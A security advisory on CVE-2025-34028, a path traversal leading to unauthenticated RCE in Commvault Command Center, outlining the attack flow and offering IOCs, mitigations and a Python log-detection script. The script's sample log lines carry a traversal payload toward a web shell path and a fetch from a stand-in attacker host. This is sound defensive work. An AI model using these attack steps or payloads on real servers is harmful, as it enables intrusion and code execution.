
CVE-2025-34028: Unauthenticated Path Traversal in Commvault Command Center

Filip Dimitrov

April 24, 2025

On April 22, 2025, a critical path traversal vulnerability (CVE-2025-34028) was disclosed in Commvault Command Center Innovation Release 11.38. An unauthenticated attacker can upload a specially crafted ZIP archive via the /deployWebpackage.do endpoint, trigger a server-side request forgery (SSRF), and achieve full Remote Code Execution (RCE).

Technical Details

  • Vuln. ID: CVE-2025-34028
  • Endpoint: /commandcenter/deployWebpackage.do
  • Root Cause: No input filtering on file paths allows traversal (CWE-22).
  • Affected Versions: Commvault Command Center Innovation Release 11.38.0 through 11.38.19
  • Severity: CVSS 3.1: 10.0 CRITICAL

Attack Flow

  1. Attacker sends a request to fetch a malicious ZIP from an external host.
  2. ZIP is uncompressed into a .tmp directory under attacker control.
  3. servicePack parameter is abused to traverse into a web-accessible folder (e.g., ../../Reports/MetricsUpload/shell).
  4. Malicious JSP is executed, granting pre-auth RCE.

Detection & IOCs

Log every POST to /deployWebpackage.do and alert on payloads that reference external URLs or begin with ZIP magic bytes (PK\x03\x04).

Enable file-integrity monitoring to catch new .tmp folders or JSP files in web-accessible paths (e.g., Reports/MetricsUpload).

Tune your IDS/IPS to flag outbound HTTP requests from the Command Center server (SSRF patterns).

Finally, run a daily script that scans for recently created or modified .zip and .jsp files in your application directories.
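The following script is an added example, not code from the advisory or from Commvault. It implements the two log- and file-based checks described above: it scans combined-format access-log lines for POSTs to the deploy endpoint whose parameters either reference an external URL or contain a parent-directory step in `servicePack`, and it lists recently modified .zip and .jsp files under an application directory. The log lines are constructed, and the `packageUrl` parameter name is a hypothetical placeholder for whichever parameter carries the fetch URL; the check is written generically over every query parameter so it does not depend on that name. Because an access log only records the query string, `looks_like_zip` is provided for pipelines (reverse proxy, WAF) that capture request bodies.

```python
"""Detection helpers for CVE-2025-34028 indicators (added example, not vendor code):
suspicious POSTs to deployWebpackage.do in access logs, ZIP-magic body checks,
and fresh .zip/.jsp artifacts on disk. Sample log lines below are constructed."""
import ipaddress
import re
import time
from pathlib import Path
from urllib.parse import parse_qs, unquote, urlparse

ENDPOINT = "/commandcenter/deployWebpackage.do"   # endpoint named in the advisory
ZIP_MAGIC = b"PK\x03\x04"                          # local-file-header signature of a ZIP

# Combined-log-format fields: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample traffic; "packageUrl" is a hypothetical parameter name.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Apr/2025:10:01:02 +0000] "GET /commandcenter/login.do HTTP/1.1" 200 512
203.0.113.9 - - [22/Apr/2025:10:02:17 +0000] "POST /commandcenter/deployWebpackage.do?servicePack=..%2F..%2FReports%2FMetricsUpload%2Fshell HTTP/1.1" 200 44
203.0.113.9 - - [22/Apr/2025:10:02:30 +0000] "POST /commandcenter/deployWebpackage.do?packageUrl=http://attacker.example/pkg.zip HTTP/1.1" 200 44
10.0.0.7 - - [22/Apr/2025:10:03:00 +0000] "POST /commandcenter/deployWebpackage.do?packageUrl=http://10.0.0.20/pkg.zip&servicePack=SP38 HTTP/1.1" 200 44
"""


def parse_log_line(line):
    """Return the fields of one combined-format access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_external_url(value, allowed_hosts=()):
    """True if value is an http(s) URL whose host is neither allow-listed nor a private/loopback IP."""
    url = urlparse(value)
    if url.scheme not in ("http", "https") or not url.hostname:
        return False
    host = url.hostname.lower()
    if host in {h.lower() for h in allowed_hosts}:
        return False
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:
        return True  # a DNS name that is not allow-listed: treat as external


def has_traversal(value):
    """True if the value (decoded twice to catch double encoding) contains a parent-directory step."""
    decoded = unquote(unquote(value)).replace("\\", "/")
    return "../" in decoded or decoded.endswith("..")


def looks_like_zip(body):
    """True if a captured request body starts with the ZIP local-file-header magic."""
    return body[:4] == ZIP_MAGIC


def find_suspicious_requests(log_text, allowed_hosts=()):
    """Return [(client_ip, reason), ...] for POSTs to the deploy endpoint whose
    query parameters reference an external URL or contain a traversal sequence."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if not rec or rec["method"] != "POST":
            continue
        target = urlparse(rec["target"])
        if not target.path.endswith("/deployWebpackage.do"):
            continue
        reasons = []
        for name, values in parse_qs(target.query, keep_blank_values=True).items():
            for v in values:
                if is_external_url(v, allowed_hosts):
                    reasons.append(f"external URL in {name}")
                if has_traversal(v):
                    reasons.append(f"path traversal in {name}")
        if reasons:
            hits.append((rec["ip"], "; ".join(reasons)))
    return hits


def find_recent_artifacts(root, max_age_hours=24, extensions=(".zip", ".jsp"), now=None):
    """Return sorted paths under root with a watched extension whose mtime is within max_age_hours.
    Modification time is used because true creation time is not portable across filesystems."""
    now = time.time() if now is None else now
    cutoff = now - max_age_hours * 3600
    return sorted(
        str(p) for p in Path(root).rglob("*")
        if p.is_file() and p.suffix.lower() in extensions and p.stat().st_mtime >= cutoff
    )


if __name__ == "__main__":
    for ip, reason in find_suspicious_requests(SAMPLE_LOG):
        print(f"ALERT {ip}: {reason}")
    # Replace with the Command Center application root on the host being checked.
    for path in find_recent_artifacts("."):
        print(f"RECENT {path}")
```

Run it once a day from a scheduled task against the access log and the application root; feed `allowed_hosts` with the update mirrors the server is legitimately expected to contact so that routine package fetches are not flagged.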

Mitigation & Recommendations

Commvault has released fixed builds (11.38.20 and 11.38.25) and urges all Innovation Release users to apply these updates immediately. You can read the advisory here.

Note: These updates are automatically handled, so manual intervention isn’t necessary.

Organizations should also consider:

  • Isolating Command Center from untrusted networks.
  • Implementing strict WAF/NGFW rules to block unauthorized access to /deployWebpackage.do.